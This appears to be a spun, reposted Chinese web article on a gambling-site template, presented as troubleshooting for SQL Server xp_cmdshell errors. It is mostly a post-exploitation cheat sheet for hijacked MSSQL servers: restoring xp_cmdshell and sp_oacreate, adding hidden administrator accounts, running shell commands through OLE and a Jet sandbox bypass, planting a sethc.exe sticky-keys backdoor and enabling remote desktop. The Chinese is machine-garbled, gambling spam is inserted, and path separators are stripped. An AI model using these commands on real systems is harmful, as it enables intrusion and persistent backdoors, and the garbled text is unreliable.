澳门网络娱乐游戏平台-澳门电子游戏娱乐网址-官方直营

新澳门注册网址关于master..xp_cmdshell’的几个错误_解决办法(转)

荒诞意气风发:Error Message:未能找到存款和储蓄进度 ‘master..xp_cmdshell’。

net user SQLDebugger list /add 
net localgroup administrators SQLDebugger /add 

首先步先删除:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc ‘xp_cmdshell’
服务器: 消息 3701,级别 11,状态 5,行 1
其次步苏醒:
dbcc addextendedproc (“sp_oacreate”,”odsole70.dll”)
dbcc addextendedproc (“xp_cmdshell”,”xplog70.dll”)
直白过来,不管sp_addextendedproc是或不是存在

Error Message:未能找到存储进度 'master..xp_cmdshell'。 

错误二:修复“拒却访问”错误:
Net1
Dir net.exe /s /p

修复法:很通用的,其实境遇 其余126 127的都足以协同修复, 

荒唐三:Error Message:SQL Server 阻止了对组件 ‘xp_cmdshell’ 的 过程 ‘sys.xp_cmdshell’ 的访问,
因为此组件已作为此服务器安全布局的生龙活虎部分而被关闭。
系统管理员能够经过行使 sp_configure 启用 ‘xp_cmdshell’。
有关启用 ‘xp_cmdshell’ 的详细音讯,请参阅 SQL Server 联机丛书中的 “外围应用配置器”。
修复方法:
;EXEC sp_configure ‘show advanced options’, 1 –
;RECONFIGURE WITH OVERRIDE –
;EXEC sp_configure ‘xp_cmdshell’, 1 –
;RECONFIGURE WITH OVERRIDE –
;EXEC sp_configure ‘show advanced options’, 0 –

除了xplog70.dll其余的都得以用那命令修复 
[/post]xp_cmdshell新的回复措施 
率先步先删除: 
drop procedure sp_addextendedproc 
drop procedure sp_oacreate 
exec sp_dropextendedproc 'xp_cmdshell' 
服务器: 消息 3701,级别 11,状态 5,行 1 
无法 除去 过程 'sp_新澳门注册网址关于master..xp_cmdshell’的几个错误_解决办法(转)。addextendedproc',因为它在系统目录中官样文章。 
服务器: 消息 3701,级别 11,状态 5,过程 sp_dropextendedproc,行 18 
无法 除去 过程 'xp_cmdshell',因为它在系统目录中不设有。 
其次步复苏: 
dbcc addextendedproc ("sp_oacreate","odsole70.dll") 
dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 
平素过来,不管sp_addextendedproc是或不是存在 

不当四:Error Message:不可能装载 DLL xpweb70.dll 或该 DLL 所援用的某黄金时代 DLL。原因: 126(找不到钦定的模块。)
修补方法:
SQLtools工具–文件管理–C盘–搜索数据库路径–复制(c:Program FilesMicrosoft SQL ServerMSSQLBinn)xplog70.dl路径
SQLtools工具–SQL命令–实施如下:
第一步.
exec sp_dropextendedproc ‘xp_cmdshell’
第二步
dbcc addextendedproc (“xp_cmdshell”,”c:Program FilesMicrosoft SQL ServerMSSQLBinnxplog70.dll”)
;EXEC sp_configure ‘show advanced options’, 0 –

xplog70.dll修复: 

乖谬五:Error Message:不能够在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到钦命的次第。State of Qatar。
修复方法:
第一步
exec sp_dropextendedproc ‘xp_cmdshell’
第二步
dbcc addextendedproc (“xp_cmdshell”,”c:Program FilesMicrosoft SQL ServerMSSQLBinnxplog70.dll”)
;EXEC sp_configure ‘show advanced options’, 0 –

Error Message:不能够装载 DLL xplog70.dll 或该 DLL 所引用的某生机勃勃 DLL。原因: 126(找不到钦点的模块。State of Qatar。 

错误六:Message:在执行 xp_cmdshell 的历程中失误。调用 ‘CreateProcess’ 失利,错误代码: ’5′。
似是而非‘5’是个系统提示的失实号,CreateProcess这几个是开创线程的情趣,那几个荒唐爆发和系统文件cmd.exe有十分的大的涉嫌,生机勃勃种状态是cmd被删去,风流浪漫种是cmd的权限被下跌了.
SQL查看终端端口及开放意况:
exec master..xp_regread ‘HKEY_LOCAL_MACHINE’,'SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp’,'PortNumber’
好了,上边关键的地点了,要用到两条sql指令,将系统的explorer文件复制为系统的shift后门文件,上边两条语句为独家执行的。
那条语句将explorer.exe复制为sethc.exe
declare @o int exec sp_oacreate ‘scripting.filesystemobject’, @o out exec sp_oamethod @o, ‘copyfile’,null,’c:windowsexplorer.exe’,'c:windowssystem32sethc.exe’;
那条语句将sethc.exe复制到dllcache目录下
declare @oo int exec sp_oacreate ‘scripting.filesystemobject’, @oo out exec sp_oamethod @oo, ‘copyfile’,null,’c:windowssystem32sethc.exe’,'c:windowssystem32dllcachesethc.exe’;
除此以外这两条语句使用到的sp_oacreate存款和储蓄进程需求运用到odsole70.dll那么些文件,所以这一个文件的存亡,关系到创设的名利双收与否。

修补XPLOG70.DLL(先用文件查看下备份的目录下x86bin,然后把上边目录替换) 

荒唐七:现身3389不能够连接的意况:
1.还未有展开3389
2.尖峰端口被纠正8888
3.内网
修补方法:
开3389:
Cmd 命令
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
Sql命令
查看3389端口

第一步 
exec sp_dropextendedproc 'xp_cmdshell' 
第二步 
dbcc addextendedproc ("xp_cmdshell","c:sql2ksp4x86binnxplog70.dll") 

exec xp_regread ‘HKEY_LOCAL_MACHINE’,'SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp’,'PortNumber’

不能够找到存款和储蓄进程 'master..xp_cmdshell'。 
第一步: 
create procedure sp_addextendedproc --- 1996/08/30 20:13 
@functname nvarchar(517),/* (owner.)name of function to call 

 

*/ 
@dllname varchar(255)/* name of DLL containing function */ 
as 
set implicit_transactions off 
if @@trancount > 0 
begin 
raiserror(15002,-1,-1,'sp_addextendedproc') 
return (1) 
end 
dbcc addextendedproc( @functname, @dllname) 
return (0) -- sp_addextendedproc 
GO 
第二步: 
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int 

转自:

SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的拜访,因为此组件已充当此服务器安全安插的大器晚成都部队分而被关门。系统一管理理员能够通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细消息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。 

;EXEC sp_configure 'show advanced options', 1 -- 
;RECONFIGURE WITH OVERRIDE -- 
;EXEC sp_configure 'xp_cmdshell', 1 -- 
;RECONFIGURE WITH OVERRIDE -- 
;EXEC sp_configure    'show advanced options', 0 -- 

删除sql危殆存储: 
DROP PROCEDURE sp_makewebtask 
exec master..sp_dropextendedproc xp_cmdshell 
exec master..sp_dropextendedproc xp_dirtree 
exec master..sp_dropextendedproc xp_fileexist 
exec master..sp_dropextendedproc xp_terminate_process 
exec master..sp_dropextendedproc sp_oamethod 
exec master..sp_dropextendedproc sp_oacreate 
exec master..sp_dropextendedproc xp_regaddmultistring 
exec master..sp_dropextendedproc xp_regdeletekey 
exec master..sp_dropextendedproc xp_regdeletevalue 
exec master..sp_dropextendedproc xp_regenumkeys 
exec master..sp_dropextendedproc xp_regenumvalues 
exec master..sp_dropextendedproc sp_add_job 
exec master..sp_dropextendedproc sp_addtask 
exec master..sp_dropextendedproc xp_regread 
exec master..sp_dropextendedproc xp_regwrite 
exec master..sp_dropextendedproc xp_readwebtask 
exec master..sp_dropextendedproc xp_makewebtask 
exec master..sp_dropextendedproc xp_regremovemultistring 
exec master..sp_dropextendedproc sp_OACreate 
DROP PROCEDURE sp_addextendedproc 

回复扩张存储进程的格局 
先恢复sp_addextendedproc,语句如下: 
第一: 
create procedure sp_addextendedproc --- 1996/08/30 20:13 
@functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ as 
set implicit_transactions off 
if @@trancount > 0    
begin 
raiserror(15002,-1,-1,'sp_addextendedproc')    
return (1)    
end 
dbcc addextendedproc( @functname, @dllname)    
return (0) -- sp_addextendedproc 
GO 

第二: 
use master    
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'    
exec sp_addextendedproc xp_dirtree,'xpstar.dll'    
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'    
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'    
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'    
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'    
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'    
exec sp_addextendedproc sp_OACreate,'odsole70.dll'    
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'    
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'    
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'    
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'    
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'    
exec sp_addextendedproc sp_OAStop,'odsole70.dll'    
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'    
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'    
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'    
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'    
exec sp_addextendedproc xp_regread,'xpstar.dll'    
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'    
exec sp_addextendedproc xp_regwrite,'xpstar.dll'    
exec sp_addextendedproc xp_availablemedia,'xpstar.dll' 

去除扩张存储过进度xp_cmdshell的语句: 
exec sp_dropextendedproc 'xp_cmdshell' 

恢复cmdshell的sql语句 
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' 

开启cmdshell的sql语句 
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' 

认清存款和储蓄扩充是或不是存在 
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 
回来结果为1就ok 

恢复xp_cmdshell 
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 
回到结果为1就ok 
要不然上传xplog7.0.dll 
exec master.dbo.addextendedproc 'xp_cmdshell','c:winntsystem32xplog70.dll' 

堵上cmdshell的sql语句 
sp_dropextendedproc "xp_cmdshell 

风流倜傥.更正sa口令方法: 
用sql综合运用工具连接后,实施命令: 
exec sp_password NULL,'新密码','sa' 
(提示:慎用!) 

二.轻巧修补sa弱口令. 

办法1:查询抽离器连接后推行: 
if exists (select * from 
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and 
OBJECTPROPERTY(id, N'IsExtendedProc') = 1) 

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]' 

GO 
接下来按F5键命令施行完成 

办法2:查询抽离器连接后 
先是步实践:use master 
第二步实行:sp_dropextendedproc 'xp_cmdshell' 
然后按F5键命令实施完成 

不能装载 DLL xpsql70.dll 或该DLL所引述的某风姿罗曼蒂克DLL。原因126(找不到钦赐模块。) 
还原措施:查询抽离器连接后, 
先是步施行:sp_dropextendedproc "xp_cmdshell" 
其次步实践:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 

束手旁观在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到钦命的前后相继。State of Qatar 
过来措施:查询分离器连接后, 
率先步实行:exec sp_dropextendedproc 'xp_cmdshell' 
其次步推行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'             
接下来按F5键命令实践完结 

假若上述措施均不足恢复生机,请尝试用下边包车型大巴点子直接抬高帐户: 
询问抽离器连接后, 
2000servser系统: 
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:winntsystem32cmd.exe /c net user Web hacker /add' 

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:winntsystem32cmd.exe /c net localgroup administrators Web /add' 

xp或2003server系统: 126错误!命令 

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c net user Web$ hacker /add' 

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c net localgroup administrators Web$ /add' 

C:>DIR C: 
SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的探问,因为此组件已作为此服务器安全体署的生机勃勃局部而被关门。系统管理员能够经过行使 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细消息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。 

深入分析器奉行的语句: 

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 

突发性用查询抽离器连接实行以上语句的时候会冒出找不到存款和储蓄进度sp_addextendedproc

焚林而猎办法: 

create procedure sp_addextendedproc --- 1996/08/30 20:13 
@functname nvarchar(517),/* (owner.)name of function to call */ 
@dllname varchar(255)/* name of DLL containing function */ 
as 
set implicit_transactions off 
if @@trancount > 0 
begin 
raiserror(15002,-1,-1,'sp_addextendedproc') 
return (1) 
end 
dbcc addextendedproc( @functname, @dllname) 
return (0) -- sp_addextendedproc 
GO 
这段代码贴入查询抽离器,施行 

能源微机: 
c:windowsexplorer.exe 

翻看目录 
exec master.dbo.xp_subdirs 'c:' 
列出磁盘 
exec master..xp_fixeddrives 

xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行) 直接加帐号! 

EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWareMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',0 
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:windowssystem32iasias.mdb','select shell("net user 123 123 /add")'); 
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:windowssystem32iasias.mdb','select shell("net localgroup administrators 123 /add")'); 

echo Windows Registry Editor Version 5.00 >3389.reg 
echo. >>3389.reg 
echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionnetcache] >>3389.reg 
echo "Enabled"="0" >>3389.reg 
echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >>3389.reg 
echo "ShutdownWithoutLogon"="0" >>3389.reg 
echo [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller] >>3389.reg 
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg 
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server] >>3389.reg 
echo "TSEnabled"=dword:00000001 >>3389.reg 
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] >>3389.reg 
echo "Start"=dword:00000002 >>3389.reg 
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService] >>3389.reg 
echo "Start"=dword:00000002 >>3389.reg 
echo [HKEY_USERS.DEFAULTKeyboard LayoutToggle] >>3389.reg 
echo "Hotkey"="1" >>3389.reg 
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp] >>3389.reg 
echo "PortNumber"=dword:00000D3D >>3389.reg 
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>3389.reg 
echo "PortNumber"=dword:00000D3D >>3389.reg 
regedit /s 3389.reg 

开3389: 

exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal Server','fDenyTSConnections','REG_DWORD',0;-- 

关3389: 

exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM新澳门注册网址,CurrentControlSetControlTerminal Server','fDenyTSConnections','REG_DWORD',1; 

查看3389端口 

exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp','PortNumber' 

翻看系统版本 
type c:boot.ini 

普通CMD后门 
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe','debugger','reg_sz','c:windowssystem32cmd.exe' 

创建客商1-这里私下认可客户是Reconditeness密码9527可活动改过 
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:winntsystem32iasias.mdb','select shell("cmd.exe /c net1 user Reconditeness 9527 /ad &net localgroup administrators terks /ad")') 
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:windowssystem32iasias.mdb','select shell("cmd.exe /c net1 user Reconditeness 9527 /ad &net localgroup administrators terks /ad")') 

本文由澳门网络娱乐游戏平台发布于数据库,转载请注明出处:新澳门注册网址关于master..xp_cmdshell’的几个错误_解决办法(转)

相关阅读